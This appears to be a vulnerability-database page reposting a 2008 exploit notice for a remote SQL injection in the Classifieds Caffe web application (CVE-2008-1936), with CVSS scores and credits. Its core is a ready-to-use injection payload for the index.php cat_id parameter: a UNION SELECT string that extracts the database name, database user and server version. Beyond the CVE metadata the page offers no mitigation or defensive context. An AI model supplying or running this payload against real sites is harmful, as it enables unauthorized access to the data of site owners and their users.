Classifieds Caffe (index.php cat_id) Remote SQL Injection

2008.04.24

Credit: JosS

Risk: Medium

Local: No

Remote: Yes

CVE: CVE-2008-1936

CWE: CWE-89

CVSS Base Score: 7.5/10

Impact Subscore: 6.4/10

Exploitability Subscore: 10/10

Exploit range: Remote

Attack complexity: Low

Authentication: No required

Confidentiality impact: Partial

Integrity impact: Partial

Availability impact: Partial

--==+=================== Spanish Hackers Team (www.spanish-hackers.com) =================+==--
--==+ Classifieds Caffe (index.php cat_id) Remote SQL Injection +==--
--==+===================================================================
=================+==--
[+] [JosS] + [Spanish Hackers Team] + [Sys - Project]
[+] Info:
[~] Software: Classifieds Caffe
[~] Exploit: Remote SQL Injection [High]
[~] Where: index.php
[~] Bug Found By: JosS
[~] Contact: sys-project[at]hotmail.com
[~] Web: http://www.spanish-hackers.com
[+] Exploit:
[~] /index.php?action=add&cat_id=[SQL]
[~] 7'+union+all+select+0,1,convert(concat(database(),char(58),user(),char(5
8),version()),char),3/*
--==+=================== Spanish Hackers Team (www.spanish-hackers.com) =================+==--
--==+ JosS +==--
--==+===================================================================
=================+==--
[+] [The End]

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Classifieds Caffe (index.php cat_id) Remote SQL Injection

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.